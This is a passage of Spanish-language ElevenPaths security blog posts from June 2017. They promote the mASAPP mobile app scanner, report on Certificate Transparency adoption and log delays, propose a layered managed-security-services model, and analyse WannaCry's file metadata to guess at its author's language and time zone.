deseada sobre los datos privados del usuario, y un sinfín de indeseables problemas de seguridad. Por esta razón, un día cualquiera, allá por el mes de junio de 2016, surgió la idea de construir una tecnología que permitiera automatizar estas tareas de descubrimiento y análisis realizadas hasta el momento por nuestro equipo de analistas de ElevenPaths. De esta forma pretendíamos proporcionar a nuestros clientes una solución que les ofreciera una visión completa y actualizada de los riesgos en su canal móvil. ¿Cómo? A través de una plataforma autónoma capaz de descubrir de manera ininterrumpida y automática cualquier aplicación correspondiente a su dominio, para posteriormente analizar éstas en profundidad de forma persistente en búsqueda de cualquier riesgo de seguridad que pudiera representar una amenaza para la integridad de sus clientes, empleados o incluso sobre la propia organización. Y de esta forma llegó mASAPP, la herramienta de descubrimiento y análisis continuo de apps móviles. Desde su presentación, los clientes y empresas que han realizado algún piloto, suelen coincidir respecto a la tremenda simplicidad e intuitivo planteamiento que ofrece la herramienta. A través de su potente motor de autodescubrimiento, los clientes son capaces de descubrir, a partir de una única aplicación semilla, cientos de aplicaciones pertenecientes a su dominio, la mayoría desconocidas para la propia compañía. Otro aspecto que destacan es la facilidad para gestionar el ciclo de vida de las vulnerabilidades identificadas en sus aplicaciones; la plataforma permite identificar riesgos de seguridad presentes o futuras que pudieran surgir en el tiempo, facilitando a las empresas su seguimiento y corrección. Aprovechando nuestra base de datos propietaria de más de 8 millones de aplicaciones provenientes de los principales markets oficiales y no oficiales, quisimos averiguar el estado de salud general del ecosistema móvil actual, y descubrimos algunos hallazgos realmente interesantes. Entre otras cosas observamos que más de 5,5 millones de aplicaciones móviles poseían algún tipo de vulnerabilidad, y sobre éstas, más de 510 mil apps estaban afectadas por vulnerabilidades muy críticas que ponían en riegos la seguridad y privacidad de sus usuarios, así como de la propia organización. Estamos sinceramente convencidos de que mASAPP ayuda a mejorar la seguridad móvil y que además cubre un hueco al que a las soluciones actuales les costaba llegar. En pocas palabras podríamos decir que esta nueva herramienta pretende hacer la vida más fácil a todas aquellas organizaciones que confían día tras día en los canales móviles para acceder más eficientemente a sus clientes y empleados. Aquí os dejamos el vídeo de presentación de nuestra herramienta: > Álvaro Rodríguez Ruiz Global Product Manager alvaro.rodriguez@global.11paths.com
23 de junio de 2017
Qué hemos presentado en Security Day 2017 (V): adiós Path6, hola mASAPP
Hoy en día ya nadie pone en duda la importancia de las aplicaciones móviles dentro de la estrategia de canal de una organización. Los smartphones se han convertido en un apéndice más de nuestro cuerpo. Nos despertamos y nos acostamos con ellos, y las organizaciones lo tienen claro: su marca, en forma de app ha de estar posicionada dentro de esta nueva extensión biotecnológica. Los beneficios son incontables e incluso obvios, ¿pero alguien ha pensado en los posibles downsides? Aplicaciones descontinuadas olvidadas (pero aún disponibles) en los markets, fugas de información sensible relativas a la infraestructura de la compañía, o vulnerabilidades críticas que dejan nuestros dispositivos (y datos personales) a merced de cualquier usuario malintencionado, son únicamente unos pocos ejemplos de las amenazas que esta nueva tendencia arroja sobre nuestra propia privacidad y seguridad. A continuación mostramos la presentación de mASAPP durante el Security Day: > Hace unos días presentamos con cierto orgullo el resultado de un ambicioso proyecto de innovación sobre el que hemos estado trabajando durante los últimos meses: mASAPP. ¿Pero qué es exactamente mASAPP? Aunque algunos quizás aún lo recuerden como Path6 (nombre del proyecto en clave sobre el que ya realizamos un pequeño adelanto en el pasado Security Innovation day), mASAPP es la plataforma desarrollada por ElevenPaths destinada a ayudar a aquellas organizaciones que emplean en su día a día los canales móviles como método para conectar más eficientemente con sus clientes y empleados. mASAPP permite descubrir, de manera continua y autónoma, el set completo de aplicaciones móviles pertenecientes a una entidad, identificando además de manera persistente nuevas vulnerabilidades y otros riesgos de seguridad sobre éstas. A través de mASAPP nuestros clientes podrán obtener de un simple vistazo una foto actualizada de su parque completo de aplicaciones móviles, incluyendo nuevas versiones añadidas en el tiempo, nuevas apps desarrolladas por empresas externas, aplicaciones retiradas en los markets, etc.; así como una visión continua del nivel de seguridad de éstas a través de análisis persistentes en profundidad que facilitan la labor de identificación, seguimiento y corrección de vulnerabilidades presentes y futuras que pudieran surgir en el tiempo sobre sus aplicaciones. En pocas palabras mASAPP pretende sencillamente hacer la vida más fácil a todas aquellas organizaciones que confían en los canales móviles para ofrecer día tras día un mejor servicio a sus clientes. *También te puede interesar: Security Day 2017_ Cyber Security beats ElevenPaths anuncia que su plataforma de seguridad cumple con el nuevo Reglamento Europeo de Protección de Datos con un año de antelación Qué hemos presentado en Security Day 2017 (I): Cómo vivimos WannaCry Qué hemos presentado en el Security Day 2017 (II): detección de amenazas móviles con nuestro partner Check Point Qué hemos presentado en Security Day 2017 (III): autenticación mediante la tecnología Mobile Connect para nuestro partner OpenCloud Factory Qué hemos presentado en Security Day 2017 (IV): intercambiamos información de ciberamenazas con Cyber Threat Alliance Qué hemos presentado en Security Day 2017 (V): adiós Path6, hola mASAPP Qué hemos presentado en Security Day 2017 (VI): La solución de Telefónica para el cumplimiento de RGPD Qué hemos presentado en Security Day 2017 (VII): El Ayuntamiento de Alcobendas apuesta por encuestas electrónicas basadas en Blockchain Qué hemos presentado en Security Day 2017 (VIII): Hack your attitude, entrega de premios del concurso de plugin Latch 2016 Qué hemos presentado en Security Day 2017 (IX): Technology Experience sobre ciberincidentes como WannaCry Qué hemos presentado en Security Day (X): Startups y emprendedores en ciberseguridad como CounterCraft Álvaro Rodríguez Ruiz Global Product Manager alvaro.rodriguez@global.11paths.com
20 de junio de 2017
Nuevo informe: ¿Está Certificate Transparency listo para funcionar como mecanismo real de seguridad?
Google ya anunció que a partir de octubre de este mismo año, Certificate Transparency será obligatorio en Chrome para todos aquellos certificados emitidos para dominios HTTPS. Otros navegadores, como Firefox ya han anunciado también su intención de adoptarlo en breve (aunque en ElevenPaths ya hemos desarrollado un plugin para permitir su comprobación). Con este mecanismo, Google espera añadir una pieza más dentro de su proyecto de transparencia "Transparency Report", además de fortalecer su plan para la migración de todos sus productos y servicios a tráfico cifrado vía HTTPS. Todo esto, dentro del movimiento que ha denominado #movingtoHTTPS, que también espera trasladar a todo internet. ¿Están tanto el ecosistema TLS como el resto de actores implicados en él, preparados para la llegada de Certificate Transparency? En este informe intentamos responder a la pregunta anterior a través de un estudio del grado real de implantación de CT a día de hoy, así como con una evaluación del correcto funcionamiento de todos los componentes y actores que involucra. Además de con alguna guía práctica, hemos contribuido en este informe con mejoras en el código del toolkit de herramientas de interactuación con los logs de Tom Ritter, mejorando algunos aspectos como la subida de certificados. Nuestro código puede encontrarse aquí. Nivel de implantación En Certificate Transparency, (al contrario que otros mecanismos), el nivel de adopción de la tecnología por parte de sus usuarios tiene un impacto directo sobre sobre el nivel de seguridad que aporta. En este caso en concreto, Certificate Transparency, necesita una base de certificados lo más nutrida posible, en la que idealmente los usuarios inserten todos los certificados existentes y además lo hagan lo más rápido posible. Para evaluar el nivel de adopción de Certificate Transparency y cómo de extendido es su uso a falta de meses para su implantación "forzosa", se ha realizado un estudio basado en los dominios más populares de internet, usando como base medio millón de dominios (500264 exactamente) del TOP 1 millón de Alexa. Para todos estos dominios, se ha extraído su certificado TLS y se ha comprobado su estado en Certificate Transparency. El resultado más significativo es que solo 64616, es decir, solo un 12.92% de los dominios estudiados implementaban Certificate Transparency. Además, de esos, solo el 87.94% realizarían correctamente la implementación, ya que el resto solo habían enviado sus dominios a menos de tres logs, algo que hará que sean detectados por el navegador como no seguros. Dificultades para cooperar La necesidad de cooperación entre los distintos actores es fundamental para el correcto funcionamiento de CT, pero… ¿cómo de fácil es conseguir esta colaboración?, ¿estamos ante una máquina bien engrasada? De los 14 logs estudiados, la inmensa mayoría de autoridades certificadoras serían confiables para entre 6 y 7 de ellos y aceptarían sus certificados. Por ejemplo, el certificado de la Fábrica Nacional de Moneda y Timbre solo tiene la oportunidad de introducirse en cuatro logs. Chrome exige que se encuentre en al menos tres conocidos. CAs aceptadas por cada log Al igual que los logs deben "confiar" en las CAs para acoger sus certificados, los usuarios de CT (CAs, propietarios de host, etc.) deben elegir a qué logs enviarán sus certificados. En este caso, hemos evaluado la popularidad de los logs en este sentido, es decir qué logs son más usados por los usuarios a la hora de subir sus certificados. Los resultados son los siguientes: Existe una discordancia entre la popularidad de los logs más escogidos por los usuarios y el número de certificados que alberga cada log. Si bien Symantec log y Digicert Log Server se posicionan dentro de los principales en cuanto a popularidad, no ocurre lo mismo en cuanto a número de certificados, donde el terreno está prácticamente copado por Google. ¿Cómo puede ocurrir que los más populares no sean los que más certificados reciben? Tras estudiar en profundidad el ecosistema, la respuesta es "sencilla", Google se está encargando activamente de recolectar e incorporar certificados a Certificate Transparency (concretamente a sus logs), con el objetivo de nutrir el ecosistema. Sin embargo, cabe destacar dos aspectos sobre esto: Por un lado, esta recolección autónoma por parte de Google, implica que los certificados se estarían subiendo a los logs de forma totalmente transparente y desconocida para el propietario del host (algo totalmente lícito dentro del marco de CT). Por otro lado, estos certificados recolectados por Google, a día de hoy, no están contribuyendo a reforzar el ecosistema de CT, ya que aunque están en los logs, los host a los que corresponden no ofrecen el SCT correspondiente desde el servidor. Análisis de tiempos Además del grado de implantación de CT a nivel global y estudiar la correcta interacción entre los diferentes actores implicados, es necesario comprobar un tercer factor fundamental, el correcto funcionamiento a nivel individual de cada uno de los componentes del ecosistema. En este aspecto, destaca por ejemplo los tiempos de funcionamiento de los logs y especialmente el tiempo que transcurre desde que un certificado es emitido hasta que es incluido en un log. En base a esto, hemos obtenido los siguientes tiempos para cada log de los incluidos en Google: Es interesante destacar además, que estos tiempos deben encontrarse dentro del MMD de cada log y que en ningún momento debe superar las 24 horas, que se consideran como límite para el correcto funcionamiento de un log. Sin embargo, en el caso de Symantec VEGA log, el tiempo medio (para las muestras estudiadas) es de 13.20 horas con un margen de más/menos 5.79 horas, por lo que el tiempo en el peor caso sería de 18.99h. Hecho que, a pesar de estar dentro del margen permitido, se acerca peligrosamente a este límite. De nuevo, recordar que hay que añadir a los tiempos anteriores una desviación adicional relativa al tiempo transcurrido entre la creación y el envío de los certificados a los logs, pero puede despreciarse debido a la baja proporción de certificados subidos por los usuarios frente a los subidos por las CA (prácticamente inmediato). Hipotéticamente, el vector que aprovecharía un atacante, sería la ventana de tiempo desde que obtiene el SCT de los logs, hasta que el certificado es incluido en el árbol de Merkle. Este es el tiempo durante el que se posee SCT para validar ante los navegadores y sin embargo el certificado no es público o visible por los monitores. En base a esto y los resultados anteriores, hemos construido un cronograma (Figura 8) con los tiempos aproximados que se manejarían (actualmente) dentro de CT y la posibilidad de que un atacante sea detectado en función de estos tiempos. Conclusiones De forma más detallada, los principales problemas encontrados que afectan al funcionamiento del ecosistema, se pueden resumir en los siguientes: Los tiempos que se manejan en los logs: El tiempo medio desde que un certificado es emitido hasta que es recogido por los logs es demasiado alto. Esto da lugar a que un atacante pueda disponer al menos de ese tiempo para utilizar certificados fraudulentos sin que CT proteja el ecosistema. La inestabilidad existente en el ciclo de vida de los logs, es a su vez un reflejo de la inestabilidad en CT. Un ejemplo de esto, es que sorprendentemente, durante el desarrollo de este estudio (mayo de 2017), Let’s Encrypt ha creado y puesto en funcionamiento su propio log (aún no incluido por Google en su lista de ‘Known Logs’), para albergar sus certificados y que, llegado ya junio de 2017, cuenta con más de 27 millones de certificados. Esto, muestra la velocidad con la que se producen los acontecimientos en este ecosistema, que aún se está fraguando. De hecho, Let’s Encrypt ha manifestado en múltiples ocasiones sus quejas acerca de que ningún log de Certificate Transparency aceptara sus certificados. Finalmente, Google lanzó el log ICARUS, precisamente con este propósito. Dentro de la relación CA – LOG, las autoridades certificadoras deberían mostrar una mayor implicación en el ecosistema, siendo las primeras en enviar todos sus certificados emitidos a todos los posibles logs de transparencia. A pesar de que Google recopila una cantidad enorme de certificados en proporción a los recogidos por la vía "usual" (envío por los usuarios), estos certificados no están siendo tenidos en cuenta por Chrome porque no adjuntan su SCT. Para mejorar esto, el navegador podría revisar en los logs si el certificado se encuentra insertado aunque el host no ofrezca un SCT, lo que implicaría almacenar un registro de certificados subidos por alguno de sus medios o almacenar los propios SCT. En resumen, Certificate Transparency está en el camino de ser una solución real y efectiva en la seguridad del ecosistema TLS/SSL, aunque a día de hoy demasiado inestable y con muchas preguntas por responder antes de poder exigir su uso obligatorio, lo que plantea la pregunta: ¿Qué ocurrirá a partir de octubre cuando CT sea obligatorio en Chrome? En cualquier caso, parte del éxito que pueda llegar a representar este mecanismo, estará condicionado al enorme apoyo que supone contar con el impulso de Google, algo que por otro lado, revierte en su propio beneficio, principalmente aumentando la seguridad de su navegador y productos derivados. El informe completo, aquí: ¿Está Certificate Transparency listo para funcionar como mecanismo real de seguridad? from ElevenPaths Innovación y laboratorio www.elevenpaths.com
19 de junio de 2017
El MSSP Inteligente
Durante años, los Servicios de Seguridad Gestionada (MSS Managed Security Services) han sido la estrategia más efectiva para enfrentarse al dinámico y creciente ecosistema de ciberamenazas. Sin embargo, algunos factores disruptivos están forzando una nueva aproximación de la seguridad de la información de las corporaciones. Estos factores se agrupan en tres tipos: los tecnológicos, como por ejemplo la desaparición del perímetro corporativo o el explosivo crecimiento en número y complejidad de las amenazas; los operacionales, relacionados a la complejidad de los procesos organizativos; y los factores de negocio, cuyo mayor representante es la necesidad de implementar una eficiente gestión del riesgo para así invertir el presupuesto preciso en seguridad, ni más, ni menos. ¿Cómo resolver estos requisitos manteniendo en control la complejidad de los Servicios de seguridad Gestionada? Este artículo, en primer lugar, identifica estos factores y a continuación propone un modelo de arquitectura de capas de MSS que pretende garantizar la adecuada coordinación entre tecnología, operación y negocio, que en último término proteja a las organizaciones del presente y del futuro. Gartner define servicios de seguridad gestionada como "la monitorización o gestión remota de las funciones de seguridad IT, entregadas vía servicios compartidos desde centros de operación de seguridad (SOCs) remotos, no mediante personal in situ. La mayor parte de los actores en el negocio de la seguridad considera a los servicios de seguridad gestionada como la aproximación más eficiente para la gestión de la seguridad corporativa para cualquier tipo de organización, y por tanto, es cada vez más habitual que las organizaciones deleguen en un proveedor de seguridad gestionada la gestión y monitorización de la seguridad del día a día, para así poder centrarse en el núcleo de su negocio. Por esta razón, todo el mundo considera que la externalización de la seguridad conlleva ahorro de costes, gestión experta y mejora en la productividad. Factores que fuerzan la evolución de los Servicios de Seguridad Gestionada Durante los meses pasados, analistas, proveedores de seguridad y clientes han advertido que hay ciertas circunstancias que fuerzan una redefinición de la seguridad gestionada. Estos pueden englobarse en tres categorías, a saber, tecnológicos, operacionales y de negocio. Dentro de la categoría tecnológica podemos encontrar la desaparición del perímetro de defensa corporativo, a causa de tecnologías como la movilidad, los servicios en la nube, las redes virtualizadas, la presencia digital o la cadena de suministro. También en esta categoría es posible citar el crecimiento exponencial de la complejidad de las amenazas, los atacantes cambian las tácticas de elusión tan rápido como las organizaciones implementan medidas de protección. En relación a los factores operacionales, la principal dificultad es lidiar con la complejidad de los procesos ligados a las Tecnologías de la Información (TI) y las Tecnologías Operativas (TO). En último lugar, las circunstancias de negocio, quizá las más recientes y también relevantes, se pueden resumir en el principio de continuidad del negocio sobre todas las cosas. Los comités directores de las empresas están a cargo de decidir el presupuesto dedicado a seguridad y esté tiene que ser fruto de un minucioso análisis de riesgos. El gasto debe ser calculado en base a la probabilidad de un ataque combinado al coste de este en recursos dedicados a la mitigación, disrupción de negocio, imagen de marca y multas del regulador. No hay duda de que la realidad del día a día está demostrando que es necesario una evolución para mantener el adecuado nivel de protección. El modelo de cuatro capas para los servicios de seguridad gestionada. El modelo de cuatro capas pretende aislar las zonas de intervención de un servicio de seguridad gestionada para así conseguir las siguientes ventajas: alcanzar un entendimiento inmediato, sencillo y aplicado de las necesidades de los clientes, facilitar la incorporación de las más nuevas tecnologías de protección y el procesamiento analítica, estandarizar los procesos de operación desde los SOCs e implementar una seguridad para el negocio efectiva. Partiendo desde la capa inferior, las capas son las siguientes: Capa operacional: procesos, personas y herramientas para la operación de los servicios de seguridad y de respuesta automática. Nos referimos a lo que los analistas llaman centro de seguridad operacional inteligente (Intelligence-driven Security Operational Centre ISOC). ISOC incluye las capacidades tradicionales de gestión de dispositivos y monitorización de seguridad y las de carácter distintivo, seguridad guiada por la información (data-driven security), respuesta adaptativa, tecnologías de forense, postanalisis para generar inteligencia de amenazas y gestión dinámica del riesgo. Esta capa operacional, y el SOC en concreto, deben cumplir ciertas directivas enunciadas por consultoras de reputado prestigio, como son: operar de una manera coordinada más que ejecutar proyectos estancos, una colaboración completa en todas las fases, poseer herramientas de información que proporcionen visibilidad y control integral, implementar procesos estandarizados y fácilmente exportables y, por último, y quizá la más relevante, disponer de equipos experimentados con las habilidades precisas y un ratio de rotación de personal bajo. Capa tecnológica: este nivel comprende las piezas tecnologías que están a cargo específicamente de la prevención y la protección, desde cortafuegos desplegados dentro del perímetro hasta servicios más avanzados como Clean Pipes sobre cortafuegos de nueva generación o CASBs (Cloud Access Service Brokers). Lo original de esta propuesta es que estos servicios se sirven de los elementos vertebrales del servicio de seguridad gestionada para coordinarse entre ellos y con el resto de capas. Sin ellos, los servicios funcionarían como piezas tecnológicas aisladas que a fin de cuentas son incapaces de ofrecer los niveles de seguridad esperados. Las capacidades vertebrales actúan como colectores de eventos y alertas que alimentan al resto de niveles y también como actuadores con la función de ejecutar la mitigación o remediación en forma de gestión de políticas. Capa Analítica: esta capa puede ser considerada como el cerebro del sistema, debido a que es el elemento responsable del procesamiento masivo de eventos (data-driven security). Se trata de la plataforma de análisis de big data y machine learning que permite descubrir ataques que han pasado desapercibidos a los elementos de protección desplegados en la capa tecnológica. Parte fundamental de esta capa es también el cálculo cruzado de indicadores a partir de la información de eventos y alertas que se recibe de todos los sistemas de prevención y protección, gracias a la cual es posible construir los cuadros de mandos de estado de seguridad y los medidores en tiempo real de la gestión del riesgo. Por último, cabe destacar la función de identificador de indicadores de compromiso que alimente base de datos de inteligencia de amenazas, tanto internas como externas. Capa de entrega: la capa superior se ocupa de como los clientes consumen y perciben la seguridad gestionada. Es fundamental ofrecer una visibilidad y control unificado de los servicios de seguridad, así como una gestión del riesgo y cumplimiento normativo, y todo ello en tiempo real y con una perspectiva granular. Seguridad para el negocio es el término que comprende estas funcionalidades, puesto que la seguridad ya no es solo una preocupación exclusiva de los departamentos de IT, sino que cada día es más relevante para la toma de decisiones de negocio. Existe un gran consenso acerca de la necesidad de una implicación directa en los asuntos de seguridad de las áreas de negocio y de los consejos delegados, y por ello es necesario hablar en términos de negocio cuando se habla de seguridad. Esta capa pretende hacer comprensible y útil la información de seguridad para el nivel C de la empresa. Por lo tanto, es clave la gestión de la seguridad mediante un portal que incluya cuadros de mandos, con la adecuada granularidad, que satisfagan las necesidades de los diferentes roles dentro de una organización y que permitan obtener lo que llamamos seguridad de un vistazo. Este término engloba el entendimiento directo del nivel de riesgo de la empresa en tiempo real y del nivel de cumplimento de SLAs por parte del proveedor de servicios de seguridad gestionada. De acuerdo a estos principios, ElevenPaths ha construido SandaS, la plataforma tecnológica de servicios de seguridad gestionada de Telefónica, la cual incluye componentes específicos que proporcionan las funcionalidades vertebrales de cada capa: SandaS RA (Respuesta automática) es el componente que hace posible la respuesta desde los SOCs de Telefónica y facilita a los expertos de seguridad resolver los incidentes de seguridad. Este elemento se encarga de tipificar y automatizar las alertas recibidas de acuerdo a una serie de reglas contextuales independientes para cada cliente. SandaS RA está desplegado en el propio SOC e integrado con sistemas de salud (Opsview, Nagios) y sistemas de ticketing de cliente. En último lugar, SandaS RA es capaz de aplicar medidas de remediación mediante configuración de políticas sobre el equipamiento de seguridad que gestiona. SandaS CA (Colector de Alertas) es el módulo de recolección y normalización de eventos y alertas que tienen como origen el equipamiento de seguridad del cliente o SIEMs, esté en sus propias instalaciones o en una nube privada (VPC). Tiene como funcionalidades principales: recolección y normalización de alertas y eventos. SandaS PA (Procesamiento analítico) está encargado de la generación de indicadores de seguridad en tiempo real basado en las alarmas y eventos provenientes del equipamiento de seguridad o de los servicios de protección. Este procesamiento cruzado exige un alto rendimiento puesto que se han de realizar millones de cálculos en milisegundos, lo cual solo es posible mediante un diseño de arquitectura refinado. Por otro lado, SandaS PA realiza un análisis basado en correlación avanzada y algoritmos de machine learning sobre eventos en crudo para descubrir ataques complejos multivector. Como consecuencia indirecta de este análisis SandaS PA genera indicadores de compromiso que alimentan bases de datos inteligencia de amenazas tanto propias como de proveedores de seguridad con los que Telefónica colabora. Conclusion Los servicios de seguridad gestionada son un complejo ecosistema, donde diferentes tecnologías, proveedores, profesionales y modelos operativos se interrelacionan; algunas veces sin llevarse del todo bien. Por lo tanto, es absolutamente necesario disponer de un elemento vertebrador que dirija la orquesta en la ejecución de la sinfonía. Desde ElevenPaths entendemos que el rol de director de orquesta debe ser jugado por un proveedor de servicios de seguridad gestionada, el cual es capaz de coordinar a los múltiples actores de cada capa y estandarizar su interrelación. ¿cómo se logra este objetivo? Creemos que se trata de la combinación en su justa medida de personas, procesos y herramientas. Nada Nuevo, o quizá sí. Francisco Oteiza Lacalle Jefe de producto en Seguridad Gestionada @Fran_Oteiza francisco.oteizalacalle@telefonica.com
15 de junio de 2017
Wannacry chronicles: Messi, coreano, bitcoins y las últimas horas del ransomware
Es difícil decir algo nuevo sobre el Wannacry (el ransomware, no el ataque). Pero merece la pena investigar cómo trabajó el atacante las horas previas al ataque. No es que nos vaya a permitir descubrir el creador, pero seguro que lo hace un poco "más humano", lanzando preguntas sobre su idioma habitual, localización y cómo empleó las últimas horas creando el ataque. Wannacry (el ransomware de nuevo, no el ataque) es un malware muy sencillo para realizar ingeniería inversa. No está ofuscado, no dispone de métodos anti-debug, no cuenta con métodos para hacer la vida más difícil a los analistas. Por tanto, el código ha sido ya puesto "del revés". Adicionalmente al código algunas empresas están intentando realizar análisis lingüísticos (muy usados recientemente) para conocer la procedencia del autor (aunque, "muy a menudo", resulta ser de China). Como resultado se suele obtener que "quizás sea de habla inglesa nativa, o quizás no, quizás el autor es nativo de China y está intentando despistar..." quién sabe. Pero una cosa es segura: le gusta el fútbol, no es ambicioso y escribe en Word habitualmente en coreano. Metadatos al rescate Durante estos últimos años se ha demostrado la utilidad de los análisis y extracción de información oculta de todo tipo de archivos ajenos, en busca de datos que de alguna manera pudiesen revelar importantes detalles que a simple vista pueden pasar desapercibidos. El dato se ha convertido en la nueva fiebre del oro. Información sensible del usuario u organización, software, correos electrónicos, rutas de almacenamiento, pero también otros detalles no menos interesantes, fechas, títulos, g eo posicionamiento, etc. Hemos oído hablar de espías, escándalos políticos por manipulación de documentos, reutilización de contenidos, fraude a las compañías de seguros, situaciones en las que los metadatos han resultado protagonistas. https://metashieldclean-up.elevenpaths.com Wannacry 2.0 utiliza algunos archivos de texto con las instrucciones para mostrar en un cuadro de texto. A primera vista, la extensión WRNY no significa nada, pero en realidad son archivos RTF. Lo que da margen para trabajar con metadatos. Para este análisis hemos usado nuestra recién estrenada herramienta Metashield Clean-up Online. Como resulado podemos encontrar a "Messi" como usuario en el sistema, los idiomas configurados en el editor de texto y las fechas y tiempos de edición. Sobre la cadena "Messi", descubrimos que algunos usuarios ya lo habían mencionado días atrás. Pero vamos a ir más allá. Esta es la version 1.0, menos conocida que su evolución Ya existía una versión Wannacry 1.0, descubierta en marzo. Sólo contenía un archivo RTF de idioma, m.wry, disponible en inglés. Este archivo fue creado el 04/03/2017 a las 13:33:00, y modificado durante 2,6 horas hasta las 17:37:00. Estas son zonas horarias locales, donde quiera que esté el atacante. El número de versión interno es 32775. Este es el número que Word (o cualquier otro creador de RTF, aunque Word específicamente utiliza valores de 5 dígitos) introduce cuando un fichero RTF se crea, pero no está oficialmente muy documentado por parte de Microsoft y parece que es único. Pero esta versión de Wannacry pasó desapercibida en el mundo del ransomware. Despúes llegó Wannacry 2.0 y trajo consigo un ataque de tipo gusano. Esta fue una versión ligeramente mejorada, con idiomas adicionales diferentes, aparte del inglés. ¿Qué ocurre con sus metadatos? Es muy interesante conocer al menos que el atacante creó (en su disco duro o los copió de algún otro lugar) todos los documentos entre las 13:52 y las 13:57, justo un día antes del ataque (últimas horas UTC de 11/05/2017). Una vez más, este es el tiempo local del atacante en cualquier parte del mundo donde se encuentre. Abrió primero el fichero en inglés a las 14:42. Tras este, muchos otros ficheros se fueron creando secuencialmente (o de nuevo, los volcó desde algún fichero zip o de un disco) hasta las 15:00. Los ficheros chinos (tradicional) y chino (simplificado) fueron los últimos, abiertos casi 4 horas más tarde, a las 18:55. Tardó 11 minutos en editar el fichero de versión "simplificado", pero le llevó justo un minuto editar el de versión "tradicional". Antes de esto, estuvo 4 minutos editando el fichero inglés. Los ficheros de idiomas japonés y vietnamita le llevaron también 4 minutos de edición. El fichero vietnamita fue el último en abrir en la primera ronda de edición, quizás porque los ficheros estaban ordenados alfabéticamente. Otros ficheros como el sueco, letón, checo o griego no los editó. El campo de autor para archivos RTF es la palabra "Messi", como en la versión 1.0 de WannaCry. Esto significa que el nombre de usuario está configurado en su versión de Office Word y probablemente también en su usuario de Windows. Puede que le guste el fútbol. El número de versión interno para esta versión 2.0 fue nuevamente 32775, lo que implica que reutilizó la plantilla de alguna forma. Metashield Clean-up Online Otro metadato más que interesante es el idioma. Todos los ficheros RTF del ransomware, independientemente del idioma en el que están escritos, tienen establecido como idiomas inglés, coreano y árabe. Estos se supone que son los idiomas de edición, con los que Word intenta corregir y en los que cree que vas a escribir de forma predeterminada. Se filtran en los RTF. Vamos explicar por qué aparece cada uno de esos idiomas, puesto que es imposible tener tres idiomas predeterminados: Árabe: Nada tiene que ver con que el usuario escriba en este idioma. Aparece siempre que se usa una versión específica de Word, muy común en EMEA (incluida España). deflangfe es el campo en RTF para "Default language ID for Asian versions of Word". No significa que sea el idioma configurado sino que se usa esa versión de Word. Se percibe por la etiqueta adeflang1025 en muchos RTF. Coreano: Este idioma aparece en la etiqueta deflang que define el idioma por defecto usado en el documento con la palabra de control plain. Significa que coreano es el idioma por defecto de la persona que escribió este documento. Inglés: Curiosamente, si estableces coreano como tu idioma por defecto, siempre irá acompañado del inglés en los documentos Word. Parece una funcionalidad de Word. Estos son los datos en bruto sacados del RTF: rtf1adeflang1025ansiansicpg1252uc2adeff31507deff0stshfdbch31505stshfloch31506stshfhich31506stshfbi0deflang1033deflangfe1042 Así que podemos decir que usa una versión tipo "EMEA" de Word (bastante común) y que su idioma por defecto es el coreano para escribir documentos. ¿Y el resto de metadatos? Un punto interesante es que el gusano usa un fichero zip que contiene el ransomware Wannacry. Esto es (en la versión 2.0 y algunas versiones 1.0) un archivo protegido con contraseña (en la versión 1.0 era wcry@2016, y en la 2.0 es WNcry@2ol7). Como sabemos, a partir de nuestra investigación anterior con Gmtcheck para Android, los ficheros zip almacenan el último acceso y la fecha de creación en el (supuesto) sistema de ficheros NTFS del atacante, con su propia zona horaria. Por tanto, las fechas del fichero zip, son las de la zona horaria de atacante. Significa que, analizando el zip, podríamos deducir lo siguiente: 2017-04-27 17:25 (hora local del atacante): El atacante crea b.wnry, un fichero BMP en segundo plano y el r.wnry, que contiene el fichero "readme". 2017-05-09 16:57: El atacante crea otro zip con herramientas para conectarse a la red Tor (y negociar el rescate). Se descargaron en el sistema de archivos del atacante a las 16:57, 09/05/2017, hora local del atacante, y son empaquetados e introducidos en un nuevo zip, s.wnry. 2017-05-10 01:16: El atacante crea en su sistema c.wnry, que contiene dominios onion de la red Tor y una cartera para bitcoins. 2017-05-11 15:59: Crea r.wnry que contiene instrucciones de borrado. 2017-05-11 16:47: Edita b.wnry. 2017-05-11 20:11: Edita c.wnry de nuevo. 2017-05-11 20:13: Introduce b.wnry en el zip y lo comprime con contraseña. 2017-05-12 02:22: Añade los ficheros EXE: u.wnry y t.wnry. El atacante empaqueta y establece una contraseña. El payload de gusano está listo. Esta última es la hora "mágica" establecida como la originaria de la infección en cada sistema infectado. Incluso en los servidores, porque es la hora almacenada en el fichero zip, por tanto, cuando el malware extrae los ficheros, el valor se copia también. Este es el "tiempo de último acceso" en todos los sistemas afectados, debido al "deszipeo" y escritura en disco que realiza el gusano. Un servidor de Windows cualquiera afectado. La misma hora y fecha. Como no tenemos ninguna referencia UTC, se puede crear esta tabla. Cada línea representa una hipótesis: Supongamos que la hora local en la que se crea el zip (12/05/2017 2:22), ocurre en todos los posibles y diferentes usos horarios GMT y los vamos descartando. Hemos añadido algunos "hechos" que sabemos que sucedieron con seguridad en una hora UTC determinada. Por ejemplo: Por tanto, vamos a imaginar. Si el atacante se encontraba en UTC+9 (Corea) y fuese coreano, deberían ser las 17:22 UTC del 11/05. Crea el payload, se va a dormir (eran las 2:22 de la mañana para el atacante, y pasó todo el día "trabajando"… ) y 7 horas después (sobre las 00:00 UTC del 12/05), la primera muestra fue avistada en algún lugar del mundo. ¿Tiene sentido esto? O quizás, las pasó inyectando Wannacry en el gusano que aprovecha EternalBlue. O quizás es español (UTC+2) y, cuando todo estuvo listo, lanzó el fichero y Palo Alto lo detectó de inmediato... Cabe recordar que la palabra "Hola" está embebida en el interior desde su versión 1.0. Con respecto a las cadenas curiosas, otra de la versión 1.0, es "test esttesttest strator" que aparece en el fichero c.wry donde también se encuentran algunos .onion y algunas URLs de dropbox ... saca tus propias conclusiones. Por último pero no menos importante. Todos sabemos que el atacante aún no ha recogido el dinero de las carteras en la versión 2.0. Tal vez demasiado arriesgado. Hemos comprobado las carteras en la versión 1.0 y podemos decir que no tomó el dinero de las víctimas en la versión 1.0, que pagaron días antes del "ataque mundial". Estas son sólo dos de las carteras de la versión 1.0, con operaciones desde principios de mayo... y el dinero intacto. Dos de las carteras de la versión de la versión 1.0, con las transacciones desde principios de mayo ... y el dinero aún sin tocar. ¿Conclusiones? Jugar a la atribución siempre es arriesgado. Los tiempos, horas y cadenas expuestos anteriormente pueden ser legítimos, o directamente falsos. Puede que le guste Messi o que lo odie. El problema es que todos los tiempos anteriores y zonas horarias son locales, por tanto, no hemos encontrado una referencia UTC que nos permita conocer la zona horaria exacta del atacante. Por otros indicios, podemos sospechar 